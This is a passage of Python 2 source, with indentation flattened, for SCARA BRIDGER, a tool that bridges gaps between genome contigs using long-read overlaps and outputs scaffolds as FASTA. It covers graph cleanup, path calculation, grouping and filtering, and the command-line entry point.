def graph_cleanup(anchornodes, readnodes, crovledges, rrovledges, reads_to_discard=None, output=True):
edgesRemoved = 0
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting graph cleanup!')
sys.stdout.write('\nSCARA BRIDGER: Discarding reads ...')
# Discarding reads that are in the discard dictionary
# To make things more efficient, the logic has to be reversed
# Discarding from anchornodes
if output:
sys.stdout.write('\nSCARA BRIDGER: Discarding from anchor nodes ...')
for anode in anchornodes.itervalues():
edgesTR = []
for edge in anode.outEdges:
if edge.endNode.name in reads_to_discard:
edgesTR.append(edge)
for edge in edgesTR:
anode.outEdges.remove(edge)
# KK: commented out to speed things up; whether this list will be useful remains to be seen
# crovledges.remove(edge)
if output:
sys.stdout.write('\nSCARA BRIDGER: Discarding from read nodes ...')
for rnode in readnodes.itervalues():
edgesTR = []
for edge in rnode.outEdges:
if edge.endNode.name in reads_to_discard:
edgesTR.append(edge)
for edge in edgesTR:
rnode.outEdges.remove(edge)
# KK: commented out to speed things up; whether this list will be useful remains to be seen
# rrovledges.remove(edge)
for rname in reads_to_discard.iterkeys():
if rname in readnodes:
del readnodes[rname]
elif output:
sys.stdout.write('\nSCARA BRIDGER: ERROR trying to delete a read: %s' % rname)
# OLD:
# if reads_to_discard is not None:
# for rname in reads_to_discard.iterkeys():
# remove_readnode(rname, anchornodes, readnodes, crovledges, rrovledges)
if output:
sys.stdout.write('\nSCARA BRIDGER: Preserving only the best overlap with anchor node!')
sys.stdout.write('\nCompleted: ')
total = len(readnodes)
count = 0
next_step = 0.1
# For each readnode, discard all overlaps with contigs except the one with the best overlap score
for rnode in readnodes.itervalues():
count += 1
if output and count > next_step*total:
sys.stdout.write('%d%% ' % (next_step*100))
next_step += 0.1
bestANode = None
maxOS = 0
for edge in rnode.outEdges:
outnode = edge.endNode
if outnode.nodetype == Node.ANCHOR and edge.OS > maxOS:
maxOS = edge.OS
bestANode = outnode
# If a read connects to at least one anchor node (bestANode exists)
# Remove connections to all other anchor nodes
# This must be done in 3 places:
# - outEdges in other anchor nodes
# - outEdges in the readnode
# - crovledges (these are the same edges as in first two cases)
if bestANode is not None:
edgesTR = []
for edge in rnode.outEdges:
if edge.endNode.nodetype == Node.ANCHOR and edge.endNode != bestANode:
edgesTR.append(edge)
for edge in edgesTR:
rnode.outEdges.remove(edge)
crovledges.remove(edge)
edgesRemoved += 1
for anode in anchornodes.itervalues():
if anode != bestANode:
edgesTR = []
for edge in anode.outEdges:
if edge.endNode == rnode:
edgesTR.append(edge)
for edge in edgesTR:
anode.outEdges.remove(edge)
crovledges.remove(edge)
edgesRemoved += 1
return edgesRemoved
# Returns info on the path
# Length in bases, number of nodes and names of starting and ending nodes
def calc_path_info(path):
length = 0
numNodes = len(path) + 1
SIsum = 0
SIavg = 0.0
if not path: # If the path is empty
return (0, 0, None, None, directionLEFT, '+', 0.0)
startNode = path[0].startNode
endNode = path[-1].endNode
direction = directionLEFT
if path[0].ESleft < path[0].ESright:
direction = directionRIGHT
startingDirection = direction
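# Each edge contributes the part of its start node that is not covered by its end node (computed from the overlap coordinates and the relative strand, depending on the current direction of extension); the full length of the last end node is added after the loop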
for edge in path:
llength = 0
SIsum += edge.SI
if direction == directionRIGHT:
if edge.Strand == '+':
llength = edge.SStart - edge.EStart
else:
llength = edge.SStart - (edge.ELen - edge.EEnd)
else:
if edge.Strand == '+':
llength = (edge.SLen - edge.SEnd) - (edge.ELen - edge.EEnd)
else:
llength = (edge.SLen - edge.SEnd) - edge.EStart
if edge.Strand == '-':
direction = reverseDirection(direction)
if llength <= 0:
sys.stderr.write('\nSCARA BRIDGER: ERROR calculating path length!')
import pdb
pdb.set_trace()
length += llength
length += path[-1].ELen
SIavg = float(SIsum) / len(path)
strand = '+'
if startingDirection != direction:
strand = '-'
return (length, numNodes, startNode.name, endNode.name, startingDirection, strand, SIavg)
# Calculate and return the reverse complement of a sequence
def revcomp(seq):
rcseq = []
for char in reversed(seq):
if char.upper() in compbase.keys():
rcchar = compbase[char.upper()]
else:
rcchar = 'N'
rcseq.append(rcchar)
return ''.join(rcseq)
# Reverses a path represented by a list of edges
# Reverses the order of edges and also each edge in the list
def reversed_path(path):
reversed_path = []
for edge in reversed(path):
reversed_edge = edge.reversed()
reversed_path.append(reversed_edge)
return reversed_path
# Generates a fasta sequence for a path consisting of a list of edges
# All edges should extend the path in the same GLOBAL direction, either left or right
# However, specific edge direction will change depending on the edge relative strand
# Each node can be anchor or read node
# NOTE: anchornodes and readnodes dictionaries are probably not necessary
# edges have references to starting and ending nodes
# 1. Generate sequence for the first node, determine global direction
# - the sequence will encompass the bases up to and including the first overlap
# - note the part of the second node that will not be included in the future (up to and including the overlap)
# 2. For each edge except the first one
# - determine relative strand and check the direction
# - generate sequence for the starting node up to and including the overlap
# taking into account not to include the previous overlap (remembered value)
# 3. Generate sequence for the last node
# - determine relative strand and check the direction
def generate_fasta_for_path(path, anchornodes, readnodes):
seq = []
rstrand = '+' # relative strand, relative to the first node in the path
# Empty path - return empty sequence
if len(path) == 0:
return ''
# Determine general direction
edge = path[0]
estrand = edge.Strand
genDirection = directionLEFT if edge.ESleft > edge.ESright else directionRIGHT
curDirection = genDirection
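# genDirection is the global direction of the whole path; curDirection tracks the expected direction of the next edge and flips whenever an edge crosses strands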
# 1. Generate sequence for the first node and determine the used part for the next iteration
# If relative strand for the edge is '-' switch global relative strand and reverse expected direction
if estrand == '-':
rstrand = '+' if rstrand == '-' else '-'
curDirection = reverseDirection(curDirection)
usedPart = 0
if genDirection == directionRIGHT:
seq.append(edge.startNode.seq[:edge.SEnd])
if rstrand == '+':
usedPart = edge.EEnd
else:
usedPart = edge.ELen - edge.EStart
else:
seq.insert(0, edge.startNode.seq[edge.SStart:])
if rstrand == '+':
usedPart = edge.ELen - edge.EStart
else :
usedPart = edge.EEnd
# 2. Generate sequences for each edge except the first one, using only starting nodes
# Relative strand and usedPart should be already calculated correctly
for edge in path[1:]:
# Check if extension direction is the same as the current direction
extDirection = directionLEFT if edge.ESleft > edge.ESright else directionRIGHT
if extDirection != curDirection:
sys.stderr.write('\nSCARA BRIDGER ERROR: inconsistent direction in a path!')
nextseq = edge.startNode.seq
if rstrand == '-':
nextseq = revcomp(nextseq)
if genDirection == directionRIGHT:
if rstrand == '+':
seq.append(nextseq[usedPart : edge.SEnd])
else:
seq.append(nextseq[usedPart : edge.SLen-edge.SStart])
else:
if rstrand == '+':
seq.insert(0, edge.startNode.seq[edge.SStart : edge.SLen-usedPart])
else:
seq.insert(0, edge.startNode.seq[edge.SLen-edge.SEnd : edge.SLen-usedPart])
# import pdb
# pdb.set_trace()
# Update relative strand and current direction for the next iteration
estrand = edge.Strand
if estrand == '-':
rstrand = '+' if rstrand == '-' else '-'
curDirection = reverseDirection(curDirection)
# Update used part for the next iteration
usedPart = 0
if genDirection == directionRIGHT:
if rstrand == '+':
usedPart = edge.EEnd
else:
usedPart = edge.ELen - edge.EStart
else:
if rstrand == '+':
usedPart = edge.ELen - edge.EStart
else :
usedPart = edge.EEnd
# 3. Generate sequence for the last node
# Relative strand and usedPart should be already calculated correctly
edge = path[-1]
nextseq = edge.endNode.seq
if rstrand == '-':
nextseq = revcomp(nextseq)
if genDirection == directionRIGHT:
seq.append(nextseq[usedPart:])
else:
seq.insert(0, nextseq[:usedPart])
return ''.join(seq)
# A function that receives a list of paths, each path is a list of edges
# The paths are grouped according to staring node and direction (or ending node),
# so that each group can be later processed separately
def group_paths(path_list, anchornodes):
filtered_paths = []
path_info_groups = []
connected_anodes = {}
path_info_list = []
# 1. Collecting path info and calculating connected nodes
for path in path_list:
(length, numNodes, sname, ename, direction, pathstrand, SIavg) = calc_path_info(path)
connected_anodes[sname] = anchornodes[sname]
connected_anodes[ename] = anchornodes[ename]
# path_info_list contains info on all paths, putting it also in reverse order (endnode, startnode)
# So that I can use it to quickly determine best connections for each node in left and right direction
# Last element of the tuple (index 5) says if the info is in reverse order compared to the path
opposite_direction = direction
if pathstrand == '+':
opposite_direction = reverseDirection(direction)
path_info_list.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
path_info_list.append((ename, sname, length, numNodes, opposite_direction, pathstrand, SIavg, reversed_path(path)))
if len(path_info_list) == 0:
return path_info_groups, connected_anodes
# 2. Group the paths according to starting node, ending node and direction (path strand)
path_info_list.sort(key=lambda pathinfo: pathinfo[5]) # sort path_info_list first according to relative strand
path_info_list.sort(key=lambda pathinfo: pathinfo[1]) # then according to end node
path_info_list.sort(key=lambda pathinfo: pathinfo[0]) # and finally according to start node
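# After the three sorts, entries with the same start node, end node and strand are adjacent, so a single pass below can build each group until one of these keys changes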
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = path_info_list[0] # Data for the first path
left_paths_plus = []
left_paths_minus = []
right_paths_plus = []
right_paths_minus = []
if direction == directionLEFT:
if pathstrand == '+':
left_paths_plus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
else:
left_paths_minus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
else:
if pathstrand == '+':
right_paths_plus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
else:
right_paths_minus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
for (sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2) in path_info_list[1:]:
# Start node, end node or path strand has changed, have to wrap up the path group and start a new one
if sname2 != sname or ename2 != ename or pathstrand2 != pathstrand:
if left_paths_plus:
path_info_groups.append(left_paths_plus)
elif left_paths_minus:
path_info_groups.append(left_paths_minus)
elif right_paths_plus:
path_info_groups.append(right_paths_plus)
elif right_paths_minus:
path_info_groups.append(right_paths_minus)
else:
sys.stderr.write('\nSCARA BRIDGER ERROR while processing paths: left and right groups are empty (%s)!' % sname)
left_paths_plus = []
left_paths_minus = []
right_paths_plus = []
right_paths_minus = []
sname = sname2 # Numnodes, pathlength, SIavg and path are not used for grouping
ename = ename2
pathstrand = pathstrand2
direction = direction2
if direction2 == directionLEFT:
if pathstrand2 == '+':
left_paths_plus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
else:
left_paths_minus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
else:
if pathstrand2 == '+':
right_paths_plus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
else:
right_paths_minus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
# At the end, add the last group to the group list
if left_paths_plus:
path_info_groups.append(left_paths_plus)
elif left_paths_minus:
path_info_groups.append(left_paths_minus)
elif right_paths_plus:
path_info_groups.append(right_paths_plus)
elif right_paths_minus:
path_info_groups.append(right_paths_minus)
else:
sys.stderr.write('\nSCARA BRIDGER ERROR while processing paths: left and right groups are empty (%s)!' % sname)
# import pdb
# pdb.set_trace()
return path_info_groups, connected_anodes
# A function that filters paths
# Each anchoring node can have at most one path extending it to the left and at most one path
# extending it to the right. Only the best paths are preserved
# pathinfo: (sname, ename, length, numNodes, direction, pathstrand, SIavg, path)
# NOTE: pgroup[0] represents the first path in the group, all paths in the group should have the same
# start node, end node and direction (depending on the strand)
def filter_path_groups(path_groups):
temp_groups = []
filtered_groups = []
discarded_groups = []
# KK: The comment below is not correct, because when linking paths, in case path contigs are on different strands,
# the direction needs to be changed!
# 1. Since each path is entered twice, once for each direction, we can look only at path
# extending in one direction - in this case direction RIGHT
# for pgroup in path_groups:
# if pgroup[0][4] == directionRIGHT:
# temp_groups.append(pgroup)
# else:
# discarded_groups.append(pgroup)
# 1. Find all used anchor nodes
used_anodes = {}
for pgroup in path_groups:
sname = pgroup[0][0]
ename = pgroup[0][1]
used_anodes[sname] = 1
used_anodes[ename] = 1
# 2. Sort groups by group size, from larger to smaller
# For each combination of anchor nodes retain only the largest group
path_groups.sort(key=lambda group: len(group), reverse=True)
used_leftnodes = {} # Nodes used for extension to the left
used_rightnodes = {} # Nodes used for extension to the right
for pgroup in path_groups:
# The following should be the same for all paths in the group
sname = pgroup[0][0]
ename = pgroup[0][1]
direction = pgroup[0][4]
pathstrand = pgroup[0][5]
snodedict = enodedict = None
if direction == directionRIGHT: # Extending start node to the right
snodedict = used_rightnodes
if pathstrand == '+':
enodedict = used_leftnodes # If start and end nodes are on the same strand, end node is extended to the left
else:
enodedict = used_rightnodes # If start and end nodes are on different strands, end node is also extended to the right
else:
snodedict = used_leftnodes
if pathstrand == '+':
enodedict = used_rightnodes
else:
enodedict = used_leftnodes
if sname not in snodedict and ename not in enodedict:
filtered_groups.append(pgroup)
snodedict[sname] = 1
enodedict[ename] = 1
else:
discarded_groups.append(pgroup)
return filtered_groups, discarded_groups
# A function that determines a representative path for each path group
# If a group contains only paths of similar length, the path with the greatest average SI is chosen
# If path length varies a lot, the paths are split according to length into buckets of 1000 bases
# For a start, the bucket with the most paths is chosen
# pathinfo: (sname, ename, length, numNodes, direction, SIavg, path)
def finalize_paths(filtered_groups, paths):
final_paths = []
STEP = 1000
for fgroup in filtered_groups:
buckets = []
bucket = []
fgroup.sort(key=lambda pathinfo: pathinfo[2]) # sort paths in a group according to length
minlength = fgroup[0][2]
bucket.append(fgroup[0])
for pathinfo in fgroup[1:]:
length = pathinfo[2]
if length > minlength + STEP:
buckets.append(bucket)
bucket = []
bucket.append(pathinfo)
minlength = length
else:
bucket.append(pathinfo)
buckets.append(bucket)
# Sort buckets according to size and choose the largest one
# Then choose the best representative path from the top bucket
buckets.sort(key=lambda bucket: len(bucket), reverse=True)
bucket = buckets[0]
bucket.sort(key=lambda pathinfo: pathinfo[6], reverse=True) # Sort according to SIavg
final_paths.append(bucket[0])
return final_paths
# Generate fasta from final paths and write them to a file if specified
# Contigs not used for scaffolds are written as is
# pathinfo: (sname, ename, length, numNodes, direction, pathstrand, SIavg, path)
def generate_fasta(final_paths, anchornodes, readnodes, filename = None):
# Calculate anchor nodes used for scaffolding
# Also add a list of anchor nodes used in each path for later use
used_nodes = {}
path_dict = {}
wrk_final_paths = []
for pathinfo in final_paths:
sname = pathinfo[0]
ename = pathinfo[1]
direction = pathinfo[4]
pathstrand = pathinfo[5]
lpathinfo = list(pathinfo)
lpathinfo.append([sname, ename])
wrk_final_paths.append(lpathinfo)
path_dict[sname] = pathinfo
if sname in used_nodes:
used_nodes[sname] += 1
else:
used_nodes[sname] = 1
if ename in used_nodes:
used_nodes[ename] += 1
else:
used_nodes[ename] = 1
# Combine linked paths
# Try joining paths together, end when no paths can be joined
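# Each successful join removes two entries from wrk_final_paths and appends one combined entry, so this loop is guaranteed to terminate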
while (True):
join = False
pinfo1 = pinfo2 = None # If two paths are joined, they will be stored in these variables
new_pinfo = None
combined_path = None
for pinfo1 in wrk_final_paths:
sname1 = pinfo1[0]
ename1 = pinfo1[1]
direction1 = pinfo1[4]
pathstrand1 = pinfo1[5]
path1 = pinfo1[7]
anodes1 = pinfo1[8]
for pinfo2 in wrk_final_paths:
sname2 = pinfo2[0]
ename2 = pinfo2[1]
direction2 = pinfo2[4]
pathstrand2 = pinfo2[5]
path2 = pinfo2[7]
anodes2 = pinfo2[8]
if pinfo1 != pinfo2:
# Extending path1 with path2
# pathinfo: (sname, ename, length, numNodes, direction, pathstrand, SIavg, path)
# At this point length and numNodes are irrelevant
try:
if ename1 == sname2:
if (pathstrand1 == '+' and direction1 == direction2) or \
(pathstrand1 == '-' and direction1 != direction2):
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = path1 + path2
new_pinfo = [sname1, ename2, 0, 0, direction1, new_pathstrand, 1.0, combined_path, anodes1 + [ename2]]
join = True
# Extending path2 with path1
elif ename2 == sname1:
if (pathstrand2 == '+' and direction2 == direction1) or \
(pathstrand2 == '-' and direction2 != direction1):
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = path2 + path1
new_pinfo = [sname2, ename1, 0, 0, direction2, new_pathstrand, 1.0, combined_path, anodes2 + [ename1]]
join = True
# Extending with reversing paths
elif sname1 == sname2 and direction1 != direction2:
rpath1 = reversed_path(path1)
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = rpath1 + path2
new_pinfo = [ename1, ename2, 0, 0, direction2, new_pathstrand, 1.0, combined_path, [ename1] + anodes2]
join = True
elif ename1 == ename2 and direction1 != direction2:
rpath2 = reversed_path(path2)
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = path1 + rpath2
new_pinfo = [sname1, sname2, 0, 0, direction1, new_pathstrand, 1.0, combined_path, anodes1 + [sname2]]
join = True
except:
import pdb
pdb.set_trace()
pass
if join: # Exit the first loop if the join was done
break
if join: # Exit the second loop if the join was done
break
if join:
wrk_final_paths.remove(pinfo1)
wrk_final_paths.remove(pinfo2)
wrk_final_paths.append(new_pinfo)
else: # Finish if no paths were joined in this iteration
break
headers = []
seqs = []
# Generate headers and fasta sequences for each combined path
i = 1
for pinfo in wrk_final_paths:
path = pinfo[7]
anodes = pinfo[8]
header = 'Scaffold%04d %s' % (i, ','.join(anodes))
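# e.g. 'Scaffold0001 ctg1,ctg7,ctg3' - the scaffold name followed by the anchor nodes it joins (names are illustrative)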
seq = generate_fasta_for_path(path, anchornodes, readnodes)
headers.append(header)
seqs.append(seq)
i += 1
# Add unused anchor nodes to the output
for aname, anode in anchornodes.iteritems():
if aname not in used_nodes:
header = '%s' % aname
seq = anode.seq
headers.append(header)
seqs.append(seq)
# Testing if the generation is correct
if len(headers) != len(seqs):
sys.stderr.write('\nSCARA BRIDGER ERROR: generating headers (%d) and sequences (%d)!' % (len(headers), len(seqs)))
# Writing output to a file
if filename is not None:
file = open(filename, 'w')
for i in xrange(len(headers)):
header = headers[i]
seq = seqs[i]
file.write('>%s\n%s\n' % (header, seq))
file.close()
return headers, seqs
def start_bridger(contigs_file, reads_file, cr_overlaps_file, rr_overlaps_file, paramdict, output=True):
load_global_parameters(paramdict)
reads_to_discard = {}
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Starting ...' % datetime.now().time().isoformat())
### Creating a graph
# 1. Adding contigs as anchor nodes
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading contigs ...' % datetime.now().time().isoformat())
anchornodes = load_anchornodes(contigs_file)
# 2. Adding reads as read nodes
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading reads ...' % datetime.now().time().isoformat())
readnodes = load_readnodes(reads_file, output = False)
# 3. processing overlaps between contigs and reads
# NOTE: for the overlaps file, we cannot be sure whether query or target
# corresponds to reads or contigs
# NOTE: OVERLAPS NEED TO BE FILTERED!
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading contig/read overlaps ...' % datetime.now().time().isoformat())
crovledges, isolated_anodes = load_cr_overlaps(cr_overlaps_file, anchornodes, readnodes, reads_to_discard)
if output:
sys.stdout.write('\nSCARA BRIDGER: %d anchor nodes are isolated!' % len(isolated_anodes))
# 4. processing overlaps between reads
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading read/read overlaps ...' % datetime.now().time().isoformat())
numthreads = 1
if '-t' in paramdict:
numthreads = int(paramdict['-t'][0])
if '--threads' in paramdict:
numthreads = int(paramdict['--threads'][0])
if numthreads == 1:
rrovledges = load_rr_overlaps_ST(rr_overlaps_file, readnodes, reads_to_discard)
else:
rrovledges = load_rr_overlaps_MT(rr_overlaps_file, readnodes, reads_to_discard, numthreads)
if output:
sys.stdout.write('\nSCARA BRIDGER before cleanup: ANODES: %d, RNODES: %d, CROVL: %d, RROVL: %d' % (len(anchornodes), len(readnodes), len(crovledges), len(rrovledges)))
### Cleaning up the graph
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Cleaning up the graph ...' % datetime.now().time().isoformat())
edgesRemoved = graph_cleanup(anchornodes, readnodes, crovledges, rrovledges, reads_to_discard)
if output:
sys.stdout.write('\nSCARA BRIDGER cleanup removed %d edges/overlaps:' % edgesRemoved)
sys.stdout.write('\nSCARA BRIDGER after cleanup: ANODES: %d, RNODES: %d, CROVL: %d, RROVL: %d' % (len(anchornodes), len(readnodes), len(crovledges), len(rrovledges)))
# import pdb
# pdb.set_trace()
### Calculating paths through the graph
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Calculating paths ...' % datetime.now().time().isoformat())
# 1. Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest OVERLAP score
paths1 = getPaths_maxovl(anchornodes, readnodes, crovledges, rrovledges)
if output:
sys.stdout.write('\nSCARA BRIDGER: Approach 1 returned %d paths!\n' % len(paths1))
# 2. Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest EXTENSION score
paths2 = getPaths_maxext(anchornodes, readnodes, crovledges, rrovledges)
if output:
sys.stdout.write('\nSCARA BRIDGER: Approach 2 returned %d paths!\n' % len(paths2))
# 3. Approach
# Monte Carlo method - randomly select reads for each extension
# probability of selecting a read is proportional to extension score
# This approach must generate more paths than the first two approaches combined
numMCpaths = 2*(len(paths1) + len(paths2) + 1)
if numMCpaths < MinMCPaths:
numMCpaths = MinMCPaths
paths3 = getPaths_MC(anchornodes, readnodes, crovledges, rrovledges, numMCpaths)
if output:
sys.stdout.write('\nSCARA BRIDGER: Approach 3 returned %d paths!\n' % len(paths3))
paths = paths1 + paths2 + paths3
# Sanity check: checking each path for consistency
sys.stdout.write('\nSCARA BRIDGER: Checking paths for consistency: ')
inconsistent_paths = 0
for path in paths:
if not check_path_consistency(path):
inconsistent_paths += 1
if inconsistent_paths > 0:
sys.stdout.write('%d paths are inconsistent!' % inconsistent_paths)
else:
sys.stdout.write('All paths are consistent!')
if '--print-graph' in paramdict:
sys.stdout.write('\nSCARA BRIDGER: Printing generated paths to %s' % 'graph.txt')
fgraph = open('graph.txt', 'w')
# Printing summary information
fgraph.write('SUMMARY:\n')
fgraph.write('SNODE, ENODE, NUMNODES, LENGTH, DIRECTION, SIAVG\n')
for path in paths:
(length, numNodes, sname, ename, sdirection, edirection, SIavg) = calc_path_info(path)
sdirection = 'LEFT' if sdirection == directionLEFT else 'RIGHT'
fgraph.write('%s, %s, %d, %d, %s, %f\n' % (sname, ename, numNodes, length, sdirection, SIavg))
# Printing detailed information (All nodes)
fgraph.write('\nDETAILS:\n')
for path in paths:
(length, numNodes, sname, ename, sdirection, edirection, SIavg) = calc_path_info(path)
fgraph.write('PATH %s - %s\n' % (sname, ename))
fgraph.write('%s' % path[0].startNode.name)
for edge in path:
fgraph.write(', %s' % edge.endNode.name)
fgraph.write('\n')
fgraph.close()
# Checking paths for duplicate reads
invalid_paths = False
if '--check-paths' in paramdict:
for path in paths:
invalid = check_path(path)
if invalid == True:
invalid_paths = True
if invalid_paths == True:
sys.stdout.write("\nSCARA BRIDGER: Invalid paths found!")
else :
sys.stdout.write("\nSCARA BRIDGER: All paths are valid!")
### Processing generated paths
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Processing paths ...' % datetime.now().time().isoformat())
sys.stdout.write('\nSCARA BRIDGER: Grouping paths ...\n')
if len(paths) == 0:
sys.stdout.write('\nSCARA BRIDGER WARNING: No paths generated! Unable to proceed. Quitting ...\n')
return
path_info_groups, connected_anodes = group_paths(paths, anchornodes)
# Determine initial connected nodes
for aname, anode in anchornodes.iteritems():
if aname not in connected_anodes:
isolated_anodes[aname] = anode
if output:
sys.stdout.write('\nSCARA BRIDGER: Isolated anchor nodes (%d) : ' % len(isolated_anodes))
# for aname in sorted(isolated_anodes.keys()):
# sys.stdout.write(' %s,' % aname)
sys.stdout.write('\nSCARA BRIDGER: Connected anchor nodes (%d) : ' % len(connected_anodes))
# for aname in sorted(connected_anodes):
# sys.stdout.write(' %s,' % aname)
if output:
sys.stdout.write('\n\nSCARA BRIDGER: Path group info: SNODE, ENODE, DIRECTION, STRAND, NUMPATHS')
for pinfo_group in path_info_groups:
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = pinfo_group[0]
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %s %s %d' % (sname, ename, strSdirection, pathstrand, len(pinfo_group)))
# import pdb
# pdb.set_trace()
if output:
sys.stdout.write('\n\nSCARA BRIDGER: Filtering path groups ...\n')
filtered_groups, discarded_groups = filter_path_groups(path_info_groups)
if output:
sys.stdout.write('\nSCARA BRIDGER: Discarded groups: SNODE, ENODE, DIRECTION, STRAND, NUMPATHS')
for pinfo_group in discarded_groups:
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = pinfo_group[0]
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %s %s %d' % (sname, ename, strSdirection, pathstrand, len(pinfo_group)))
sys.stdout.write('\n\nSCARA BRIDGER: Remaining groups: SNODE, ENODE, DIRECTION, STRAND, NUMPATHS')
for pinfo_group in filtered_groups:
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = pinfo_group[0]
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %s %s %d' % (sname, ename, strSdirection, pathstrand, len(pinfo_group)))
if output:
sys.stdout.write('\n\nSCARA BRIDGER: Final path filtering ...\n')
final_paths = finalize_paths(filtered_groups, paths)
# pathinfo: (sname, ename, length, numNodes, direction, pathstrand, SIavg, path)
longpaths = 0
if output:
sys.stdout.write('\nSCARA BRIDGER FINAL PATHS: SNODE, ENODE, LENGTH, NUMNODES, DIRECTION, STRAND, SIAVG')
for (sname, ename, length, numNodes, direction, pathstrand, SIavg, path) in final_paths:
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %d %d %s %s %f' % (sname, ename, length, numNodes, strSdirection, pathstrand, SIavg))
if numNodes > SoftNodeLimit:
longpaths += 1
if longpaths > 0:
sys.stdout.write('\nWARNING: Final paths contain %d paths longer than %d nodes!' % (longpaths, SoftNodeLimit))
sys.stdout.write('\nYou should consider modifying global parameters!')
if output:
sys.stdout.write('\n\n[%s]SCARA BRIDGER: Generating FASTA ...' % datetime.now().time().isoformat())
out_filename = 'scaffolds.fasta'
if '-o' in paramdict:
out_filename = paramdict['-o'][0]
elif '--output' in paramdict:
out_filename = paramdict['--output'][0]
headers, seqs = generate_fasta(final_paths, anchornodes, readnodes, filename = out_filename)
if output:
sys.stdout.write('\nSCARA BRIDGER: FASTA sequences generated: %d\n' % len(headers))
# for header in headers:
# sys.stdout.write('\n%s' % header)
# import pdb
# pdb.set_trace()
sys.stderr.write('\n\n[%s]SCAFFOLDING with SCARA BRIDGER DONE!\n' % datetime.now().time().isoformat())
def load_fast(reads_file, output = True):
filename, file_extension = os.path.splitext(reads_file)
ftype = ''
if file_extension.upper() in ('.FA', '.FNA', '.FASTA'):
ftype = 'FASTA'
elif file_extension.upper() in ('.FQ', '.FASTQ'):
ftype = 'FASTQ'
else:
sys.stderr.write('\nERROR: Invalid file extension: %s' % reads_file)
return
[headers, seqs, quals] = read_fastq(reads_file)
if output == True:
sys.stdout.write('\n%s | File type: %s' % (reads_file, ftype))
sys.stdout.write('\nNumber of entries: %d\n' % len(seqs))
for i in xrange(len(headers)):
sys.stdout.write('contig: %s, length: %d\n' % (headers[i], len(seqs[i])))
return [headers, seqs, quals]
def load_paf(paf_file, output = True):
filename, file_extension = os.path.splitext(paf_file)
ftype = ''
if file_extension.upper() in ('.PAF',):
ftype = 'PAF'
else:
sys.stderr.write('\nERROR: Invalid file extension: %s' % paf_file)
return
paf_lines = PAFutils.load_paf(paf_file)
if output == True:
sys.stdout.write('\n%s | File type: %s' % (paf_file, ftype))
sys.stdout.write('\nNumber of entries: %d\n' % len(paf_lines))
return paf_lines
def verbose_usage_and_exit():
sys.stderr.write('bridger - a scaffolding tool that bridges gaps between contigs using long reads.\n')
sys.stderr.write('\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('\t%s [mode]\n' % sys.argv[0])
sys.stderr.write('\n')
sys.stderr.write('\tmode:\n')
sys.stderr.write('\t\tscaffold\n')
sys.stderr.write('\t\tload_fast\n')
sys.stderr.write('\t\tload_paf\n')
sys.stderr.write('\t\tload_sam\n')
sys.stderr.write('\n')
exit(0)
if __name__ == '__main__':
if (len(sys.argv) < 2):
verbose_usage_and_exit()
mode = sys.argv[1]
if (mode == 'scaffold'):
if (len(sys.argv) < 6):
sys.stderr.write('Scaffold given contigs with given reads and their overlaps.\n')
sys.stderr.write('Usage:\n')
            sys.stderr.write('%s %s <contigs FASTA> <reads FASTA> <reads-contigs overlaps PAF/SAM> <reads-reads overlaps PAF/SAM> options\n' % (sys.argv[0], sys.argv[1]))
            sys.stderr.write('options:\n')
sys.stderr.write('-o (--output) <file> : output file to which the report will be written\n')
sys.stderr.write('\n')
exit(1)
contigs_file = sys.argv[2]
reads_file = sys.argv[3]
cr_overlaps_file = sys.argv[4]
rr_overlaps_file = sys.argv[5]
pparser = paramsparser.Parser(paramdefs)
paramdict = pparser.parseCmdArgs(sys.argv[6:])
paramdict['command'] = ' '.join(sys.argv)
start_bridger(contigs_file, reads_file, cr_overlaps_file, rr_overlaps_file, paramdict)
elif (mode == 'load_fast'):
if (len(sys.argv) != 3):
sys.stderr.write('Load FASTA / FASTQ file with reads.\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('%s %s <reads FASTA>\n' % (sys.argv[0], sys.argv[1]))
sys.stderr.write('\n')
exit(1)
reads_file = sys.argv[2]
load_fast(reads_file)
elif (mode == 'load_paf'):
if (len(sys.argv) != 3):
sys.stderr.write('Load PAF file with overlaps.\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('%s %s <overlaps PAF>\n' % (sys.argv[0], sys.argv[1]))
sys.stderr.write('\n')
exit(1)
overlaps_file = sys.argv[2]
